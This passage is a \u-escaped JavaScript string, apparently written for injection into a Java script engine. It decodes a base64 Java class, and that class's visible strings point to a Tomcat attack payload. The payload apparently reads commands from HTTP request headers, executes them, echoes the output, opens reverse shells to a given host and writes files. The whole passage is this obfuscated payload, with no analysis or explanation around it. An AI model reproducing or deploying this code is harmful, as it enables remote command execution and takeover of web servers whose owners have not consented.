02e\u006c\u0065\u006e\u0067\u0074\u0068\u002c\u0020\u0063\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u002c\u0020\u0070\u0072\u006f\u0074\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u006f\u006d\u0061\u0069\u006e\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u0063\u0061\u0074\u0063\u0068\u0028\u0065\u0072\u0072\u006f\u0072\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0065\u0072\u0072\u006f\u0072\u002e\u0070\u0072\u0069\u006e\u0074\u0053\u0074\u0061\u0063\u006b\u0054\u0072\u0061\u0063\u0065\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u0066\u0069\u006e\u0061\u006c\u006c\u0079\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0063\u006c\u007a\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0062\u0061\u0073\u0065\u0036\u0034\u0044\u0065\u0063\u006f\u0064\u0065\u0054\u006f\u0042\u0079\u0074\u0065\u0028\u0073\u0074\u0072\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0062\u0074\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0074\u0072\u0079\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0062\u0074\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u0073\u0075\u006e\u002e\u006d\u0069\u0073\u0063\u002e\u0042\u0041\u0053\u0045\u0036\u0034\u0044\u0065\u0063\u006f\u0064\u0065\u0072\u005c\u0022\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u002e\u0064\u0065\u0063\u006f\u0064\u0065\u0042\u0075\u0066\u0066\u0065\u0072\u0028\u0073\u0074\u0072\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u0063\u0061\u0074\u0063\u0068\u0028\u0065\u0029\u007b\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0069\u0066\u0020\u0028\u0062\u0074\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0074\u0072\u0079\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0020\u0020\u0062\u0074\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0042\u0061\u0073\u0065\u0036\u0034\u005c\u0022\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006f\u0064\u0065\u0072\u0028\u0029\u002e\u0064\u0065\u0063\u006f\u0064\u0065\u0028\u0073\u0074\u0072\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u007d\u0063\u0061\u0074\u0063\u0068\u0028\u0065\u0029\u007b\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0069\u0066\u0028\u0062\u0074\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0074\u0072\u0079\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0020\u0020\u0062\u0074\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0042\u0061\u0073\u0065\u0036\u0034\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006f\u0064\u0065\u0072\u0028\u0029\u002e\u0064\u0065\u0063\u006f\u0064\u0065\u0028\u0073\u0074\u0072\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u007d\u0063\u0061\u0074\u0063\u0068\u0028\u0065\u0029\u007b\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0069\u0066\u0020\u0028\u0062\u0074\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0062\u0074\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006f\u0072\u0067\u002e\u0061\u0070\u0061\u0063\u0068\u0065\u002e\u0063\u006f\u006d\u006d\u006f\u006e\u0073\u002e\u0063\u006f\u0064\u0065\u0063\u002e\u0062\u0069\u006e\u0061\u0072\u0079\u002e\u0042\u0061\u0073\u0065\u0036\u0034\u005c\u0022\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u002e\u0064\u0065\u0063\u006f\u0064\u0065\u0028\u0073\u0074\u0072\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0062\u0074\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0076\u0061\u0072\u0020\u0063\u006f\u0064\u0065\u003d\u005c\u0022\u0079\u0076\u0036\u0036\u0076\u0067\u0041\u0041\u0041\u0044\u0045\u0042\u006a\u0077\u006f\u0041\u0048\u0067\u0043\u006e\u0043\u0067\u0042\u0044\u0041\u004b\u0067\u004b\u0041\u0045\u004d\u0041\u0071\u0051\u006f\u0041\u0048\u0067\u0043\u0071\u0043\u0041\u0043\u0072\u0043\u0067\u0041\u0063\u0041\u004b\u0077\u004b\u0041\u004b\u0030\u0041\u0072\u0067\u006f\u0041\u0072\u0051\u0043\u0076\u0042\u0077\u0043\u0077\u0043\u0067\u0042\u0044\u0041\u004c\u0045\u0049\u0041\u004a\u0038\u004b\u0041\u0043\u0045\u0041\u0073\u0067\u0067\u0041\u0073\u0077\u0067\u0041\u0074\u0041\u0063\u0041\u0074\u0051\u0067\u0041\u0074\u0067\u0067\u0041\u0074\u0077\u0063\u0041\u0075\u0041\u006f\u0041\u0048\u0041\u0043\u0035\u0043\u0041\u0043\u0036\u0043\u0041\u0043\u0037\u0042\u0077\u0043\u0038\u0043\u0077\u0041\u0057\u0041\u004c\u0030\u004c\u0041\u004c\u0034\u0041\u0076\u0077\u0073\u0041\u0076\u0067\u0044\u0041\u0043\u0041\u0044\u0042\u0043\u0041\u0044\u0043\u0042\u0077\u0044\u0044\u0043\u0067\u0041\u0063\u0041\u004d\u0051\u0048\u0041\u004d\u0055\u004b\u0041\u004d\u0059\u0041\u0078\u0077\u0067\u0041\u0079\u0041\u0063\u0041\u0079\u0051\u0067\u0041\u0079\u0067\u006f\u0041\u006a\u0041\u0044\u004c\u0043\u0067\u0041\u0068\u0041\u004d\u0077\u0049\u0041\u004d\u0030\u004a\u0041\u004d\u0034\u0041\u007a\u0077\u006f\u0041\u007a\u0067\u0044\u0051\u0043\u0041\u0044\u0052\u0043\u0067\u0043\u004d\u0041\u004e\u0049\u004b\u0041\u0042\u0077\u0041\u0030\u0077\u0067\u0041\u0031\u0041\u0063\u0041\u0031\u0051\u006f\u0041\u0048\u0041\u0044\u0057\u0043\u0041\u0044\u0058\u0042\u0077\u0044\u0059\u0043\u0041\u0044\u005a\u0043\u0041\u0044\u0061\u0043\u0067\u0041\u0063\u0041\u004e\u0073\u0048\u0041\u004e\u0077\u004b\u0041\u0045\u004d\u0041\u0033\u0051\u006f\u0041\u0033\u0067\u0044\u0053\u0043\u0041\u0044\u0066\u0043\u0067\u0041\u0068\u0041\u004f\u0041\u0049\u0041\u004f\u0045\u004b\u0041\u0043\u0045\u0041\u0034\u0067\u0067\u0041\u0034\u0077\u006f\u0041\u0049\u0051\u0044\u006b\u0043\u0067\u0043\u004d\u0041\u004f\u0055\u0049\u0041\u004f\u0059\u004b\u0041\u0043\u0045\u0041\u0035\u0077\u0067\u0041\u0036\u0041\u006b\u0041\u006a\u0041\u0044\u0070\u0043\u0067\u0044\u004f\u0041\u004f\u006f\u004a\u0041\u0049\u0077\u0041\u0036\u0077\u0063\u0041\u0037\u0041\u006f\u0041\u0051\u0077\u0044\u0074\u0043\u0067\u0042\u0044\u0041\u004f\u0034\u0049\u0041\u004b\u0041\u0049\u0041\u004f\u0038\u0049\u0041\u0050\u0041\u004b\u0041\u0049\u0077\u0041\u0038\u0051\u0067\u0041\u0038\u0067\u006f\u0041\u006a\u0041\u0044\u007a\u0042\u0077\u0044\u0030\u0043\u0067\u0042\u004d\u0041\u0050\u0055\u0048\u0041\u0050\u0059\u004b\u0041\u0045\u0034\u0041\u0039\u0077\u006f\u0041\u006a\u0041\u0044\u0034\u0043\u0067\u0042\u004f\u0041\u0050\u006b\u004b\u0041\u0045\u0034\u0041\u002b\u0067\u006f\u0041\u0054\u0067\u0044\u0037\u0043\u0067\u0041\u0076\u0041\u0050\u0077\u004b\u0041\u0045\u0077\u0041\u002f\u0051\u006f\u0041\u0049\u0051\u0044\u002b\u0043\u0041\u0044\u002f\u0043\u0067\u0045\u0041\u0041\u0051\u0045\u004b\u0041\u0043\u0045\u0042\u0041\u0067\u0067\u0042\u0041\u0077\u0067\u0042\u0042\u0041\u0067\u0042\u0042\u0051\u0063\u0042\u0042\u0067\u006f\u0041\u0058\u0051\u0043\u006e\u0043\u0067\u0042\u0064\u0041\u0051\u0063\u0049\u0041\u0051\u0067\u004b\u0041\u0046\u0030\u0041\u002f\u0041\u0067\u0042\u0043\u0051\u0067\u0042\u0043\u0067\u0067\u0042\u0043\u0077\u0067\u0042\u0044\u0041\u006f\u0042\u0044\u0051\u0045\u004f\u0043\u0067\u0045\u004e\u0041\u0051\u0038\u0048\u0041\u0052\u0041\u004b\u0041\u0052\u0045\u0042\u0045\u0067\u006f\u0041\u0061\u0041\u0045\u0054\u0043\u0041\u0045\u0055\u0043\u0067\u0042\u006f\u0041\u0052\u0055\u004b\u0041\u0047\u0067\u0041\u0076\u0077\u006f\u0041\u0061\u0041\u0045\u0057\u0043\u0067\u0045\u0052\u0041\u0052\u0063\u004b\u0041\u0052\u0045\u0042\u0047\u0041\u0067\u0042\u0047\u0051\u0067\u0042\u0047\u0067\u006f\u0042\u0044\u0051\u0045\u0062\u0042\u0077\u0045\u0063\u0043\u0067\u0042\u0030\u0041\u0052\u0030\u004b\u0041\u0048\u0051\u0042\u0045\u0067\u006f\u0042\u0045\u0051\u0045\u0065\u0043\u0067\u0042\u0030\u0041\u0052\u0034\u004b\u0041\u0048\u0051\u0042\u0048\u0077\u006f\u0042\u0049\u0041\u0045\u0068\u0043\u0067\u0045\u0067\u0041\u0053\u0049\u004b\u0041\u0053\u004d\u0042\u004a\u0041\u006f\u0042\u0049\u0077\u0044\u0036\u0042\u0051\u0041\u0041\u0041\u0041\u0041\u0041\u0041\u0041\u0041\u0079\u0043\u0067\u0042\u0044\u0041\u0053\u0055\u004b\u0041\u0052\u0045\u0042\u004a\u0067\u006f\u0041\u0064\u0041\u0044\u0037\u0043\u0067\u0041\u0076\u0041\u0053\u0063\u004b\u0041\u004d\u0034\u0042\u004b\u0041\u006f\u0041\u006a\u0041\u0045\u0070\u0043\u0041\u0045\u0071\u0043\u0041\u0045\u0072\u0043\u0041\u0045\u0073\u0043\u0041\u0045\u0074\u0043\u0041\u0043\u006a\u0043\u0041\u0045\u0075\u0042\u0077\u0045\u0076\u0041\u0051\u0041\u0043\u0061\u0058\u0041\u0042\u0041\u0042\u004a\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0073\u0042\u0041\u0041\u0052\u0077\u0062\u0033\u004a\u0030\u0041\u0051\u0041\u0054\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u004a\u0062\u006e\u0052\u006c\u005a\u0032\u0056\u0079\u004f\u0077\u0045\u0041\u0042\u006a\u0078\u0070\u0062\u006d\u006c\u0030\u0050\u0067\u0045\u0041\u0041\u0079\u0067\u0070\u0056\u0067\u0045\u0041\u0042\u0045\u004e\u0076\u005a\u0047\u0055\u0042\u0041\u0041\u0039\u004d\u0061\u0057\u0035\u006c\u0054\u006e\u0056\u0074\u0059\u006d\u0056\u0079\u0056\u0047\u0046\u0069\u0062\u0047\u0055\u0042\u0041\u0041\u0070\u0046\u0065\u0047\u004e\u006c\u0063\u0048\u0052\u0070\u0062\u0032\u0035\u007a\u0041\u0051\u0041\u004a\u0062\u0047\u0039\u0068\u005a\u0045\u004e\u0073\u0059\u0058\u004e\u007a\u0041\u0051\u0041\u006c\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0079\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u004e\u0073\u0059\u0058\u004e\u007a\u004f\u0077\u0045\u0041\u0043\u0056\u004e\u0070\u005a\u0032\u0035\u0068\u0064\u0048\u0056\u0079\u005a\u0051\u0045\u0041\u004b\u0043\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0073\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0044\u0062\u0047\u0046\u007a\u0063\u007a\u0077\u0071\u0050\u006a\u0073\u0042\u0041\u0041\u0056\u0077\u0063\u006d\u0039\u0034\u0065\u0051\u0045\u0041\u004a\u0069\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0073\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u0041\u0051\u0041\u0046\u0064\u0033\u004a\u0070\u0064\u0047\u0055\u0042\u0041\u0044\u0067\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0077\u0045\u0041\u0043\u006d\u004e\u0073\u005a\u0057\u0046\u0079\u0055\u0047\u0046\u0079\u0059\u0057\u0030\u0042\u0041\u0041\u0052\u006c\u0065\u0047\u0056\u006a\u0041\u0051\u0041\u0048\u0063\u006d\u0056\u0032\u005a\u0058\u004a\u007a\u005a\u0051\u0045\u0041\u0046\u0069\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0074\u004a\u004b\u0056\u0059\u0042\u0041\u0041\u004e\u0079\u0064\u0057\u0034\u0042\u0041\u0041\u005a\u006b\u005a\u0057\u004e\u0076\u005a\u0047\u0055\u0042\u0041\u0042\u0059\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u004b\u0056\u0074\u0043\u0041\u0051\u0041\u004b\u0055\u0032\u0039\u0031\u0063\u006d\u004e\u006c\u0052\u006d\u006c\u0073\u005a\u0051\u0045\u0041\u0042\u0030\u0045\u0030\u004c\u006d\u0070\u0068\u0064\u006d\u0045\u004d\u0041\u004a\u0045\u0041\u006b\u0067\u0077\u0042\u004d\u0041\u0045\u0078\u0044\u0041\u0045\u0079\u0041\u0054\u004d\u004d\u0041\u0054\u0051\u0042\u004e\u0051\u0045\u0041\u0042\u0033\u0052\u006f\u0063\u006d\u0056\u0068\u005a\u0048\u004d\u004d\u0041\u0054\u0059\u0042\u004e\u0077\u0063\u0042\u004f\u0041\u0077\u0042\u004f\u0051\u0045\u0036\u0044\u0041\u0045\u0037\u0041\u0054\u0077\u0042\u0041\u0042\u004e\u0062\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0055\u0061\u0048\u004a\u006c\u0059\u0057\u0051\u0037\u0044\u0041\u0045\u0039\u0041\u0054\u0034\u004d\u0041\u0054\u0038\u0042\u0051\u0041\u0045\u0041\u0042\u0047\u0068\u0030\u0064\u0048\u0041\u0042\u0041\u0041\u005a\u0030\u0059\u0058\u004a\u006e\u005a\u0058\u0051\u0042\u0041\u0042\u004a\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u006e\u0056\u0075\u0062\u006d\u0046\u0069\u0062\u0047\u0055\u0042\u0041\u0041\u005a\u0030\u0061\u0047\u006c\u007a\u004a\u0044\u0041\u0042\u0041\u0041\u0064\u006f\u0059\u0057\u0035\u006b\u0062\u0047\u0056\u0079\u0041\u0051\u0041\u0065\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u0035\u0076\u0055\u0033\u0056\u006a\u0061\u0045\u005a\u0070\u005a\u0057\u0078\u006b\u0052\u0058\u0068\u006a\u005a\u0058\u0042\u0030\u0061\u0057\u0039\u0075\u0044\u0041\u0046\u0042\u0041\u0054\u0055\u0042\u0041\u0041\u005a\u006e\u0062\u0047\u0039\u0069\u0059\u0057\u0077\u0042\u0041\u0041\u0070\u0077\u0063\u006d\u0039\u006a\u005a\u0058\u004e\u007a\u0062\u0033\u004a\u007a\u0041\u0051\u0041\u004f\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0031\u0064\u0047\u006c\u0073\u004c\u0030\u0078\u0070\u0063\u0033\u0051\u004d\u0041\u0055\u0049\u0042\u0051\u0077\u0063\u0042\u0052\u0041\u0077\u0042\u0052\u0051\u0046\u0047\u0044\u0041\u0046\u0048\u0041\u0055\u0067\u0042\u0041\u0041\u004e\u0079\u005a\u0058\u0045\u0042\u0041\u0041\u0074\u006e\u005a\u0058\u0052\u0053\u005a\u0058\u004e\u0077\u0062\u0032\u0035\u007a\u005a\u0051\u0045\u0041\u0044\u0032\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0044\u0062\u0047\u0046\u007a\u0063\u0077\u0077\u0042\u0053\u0051\u0046\u004b\u0041\u0051\u0041\u0051\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u0039\u0069\u0061\u006d\u0056\u006a\u0064\u0041\u0063\u0042\u0053\u0077\u0077\u0042\u0054\u0041\u0046\u004e\u0041\u0051\u0041\u004a\u005a\u0032\u0056\u0030\u0053\u0047\u0056\u0068\u005a\u0047\u0056\u0079\u0041\u0051\u0041\u0051\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u0077\u0045\u0041\u0041\u0032\u004e\u0074\u005a\u0041\u0077\u0041\u006d\u0067\u0043\u0062\u0044\u0041\u0046\u004f\u0041\u0055\u0038\u0042\u0041\u0041\u006c\u007a\u005a\u0058\u0052\u0054\u0064\u0047\u0046\u0030\u0064\u0058\u004d\u0048\u0041\u0056\u0041\u004d\u0041\u0056\u0045\u0042\u0055\u0067\u0077\u0042\u0055\u0077\u0046\u0055\u0041\u0051\u0041\u006b\u0062\u0033\u004a\u006e\u004c\u006d\u0046\u0077\u0059\u0057\u004e\u006f\u005a\u0053\u0035\u0030\u0062\u0032\u0031\u006a\u0059\u0058\u0051\u0075\u0064\u0058\u0052\u0070\u0062\u0043\u0035\u0069\u0064\u0057\u0059\u0075\u0051\u006e\u006c\u0030\u005a\u0055\u004e\u006f\u0064\u0057\u0035\u0072\u0044\u0041\u0043\u0057\u0041\u004a\u0063\u004d\u0041\u0056\u0055\u0042\u0053\u0041\u0045\u0041\u0043\u0048\u004e\u006c\u0064\u0045\u004a\u0035\u0064\u0047\u0056\u007a\u0041\u0051\u0041\u0043\u0057\u0030\u0049\u004d\u0041\u0056\u0059\u0042\u0053\u0067\u0045\u0041\u0042\u0032\u0052\u0076\u0056\u0033\u004a\u0070\u0064\u0047\u0055\u0042\u0041\u0042\u004e\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0052\u0058\u0068\u006a\u005a\u0058\u0042\u0030\u0061\u0057\u0039\u0075\u0041\u0051\u0041\u0054\u0061\u006d\u0046\u0032\u0059\u0053\u0035\u0075\u0061\u0057\u0038\u0075\u0051\u006e\u006c\u0030\u005a\u0055\u004a\u0031\u005a\u006d\u005a\u006c\u0063\u0067\u0045\u0041\u0042\u0048\u0064\u0079\u0059\u0058\u0041\u004d\u0041\u0056\u0063\u0041\u006c\u0077\u0045\u0041\u0049\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0044\u0062\u0047\u0046\u007a\u0063\u0030\u0035\u0076\u0064\u0045\u005a\u0076\u0064\u0057\u0035\u006b\u0052\u0058\u0068\u006a\u005a\u0058\u0042\u0030\u0061\u0057\u0039\u0075\u0044\u0041\u0046\u0059\u0041\u0056\u006b\u0048\u0041\u0056\u006f\u0042\u0041\u0041\u0041\u004d\u0041\u0056\u0073\u0042\u0058\u0041\u0045\u0041\u0045\u0047\u004e\u0076\u0062\u0057\u0031\u0068\u0062\u006d\u0051\u0067\u0062\u006d\u0039\u0030\u0049\u0047\u0035\u0031\u0062\u0047\u0077\u004d\u0041\u0056\u0030\u0042\u0050\u0067\u0045\u0041\u0042\u0053\u004d\u006a\u0049\u0079\u004d\u006a\u0044\u0041\u0046\u0065\u0041\u0056\u0038\u004d\u0041\u004a\u0034\u0041\u006d\u0077\u0045\u0041\u0041\u0054\u006f\u004d\u0041\u0057\u0041\u0042\u0059\u0051\u0045\u0041\u0049\u006d\u004e\u0076\u0062\u0057\u0031\u0068\u0062\u006d\u0051\u0067\u0063\u006d\u0056\u0032\u005a\u0058\u004a\u007a\u005a\u0053\u0042\u006f\u0062\u0033\u004e\u0030\u0049\u0047\u005a\u0076\u0063\u006d\u0031\u0068\u0064\u0043\u0042\u006c\u0063\u006e\u004a\u0076\u0063\u0069\u0045\u004d\u0041\u0049\u0030\u0041\u006a\u0067\u0077\u0042\u0059\u0067\u0046\u006a\u0044\u0041\u0043\u0050\u0041\u004a\u0041\u0042\u0041\u0042\u0042\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0056\u0047\u0068\u0079\u005a\u0057\u0046\u006b\u0044\u0041\u0043\u0052\u0041\u0057\u0051\u004d\u0041\u0057\u0055\u0041\u006b\u0067\u0045\u0041\u0042\u0053\u0051\u006b\u004a\u0043\u0051\u006b\u0041\u0051\u0041\u0053\u005a\u006d\u006c\u0073\u005a\u0053\u0042\u006d\u0062\u0033\u004a\u0074\u0059\u0058\u0051\u0067\u005a\u0058\u004a\u0079\u0062\u0033\u0049\u0068\u0044\u0041\u0043\u0063\u0041\u004a\u0030\u0042\u0041\u0041\u0056\u0041\u0051\u0045\u0042\u0041\u0051\u0041\u0077\u0041\u006e\u0077\u0043\u0062\u0041\u0051\u0041\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0070\u0062\u0079\u0039\u0047\u0061\u0057\u0078\u006c\u0044\u0041\u0043\u0052\u0041\u0057\u0059\u0042\u0041\u0042\u0068\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u006c\u0076\u004c\u0030\u005a\u0070\u0062\u0047\u0056\u0050\u0064\u0058\u0052\u0077\u0064\u0058\u0052\u0054\u0064\u0048\u004a\u006c\u0059\u0057\u0030\u004d\u0041\u004a\u0045\u0042\u005a\u0077\u0077\u0041\u006f\u0077\u0043\u006b\u0044\u0041\u0043\u0063\u0041\u0057\u0067\u004d\u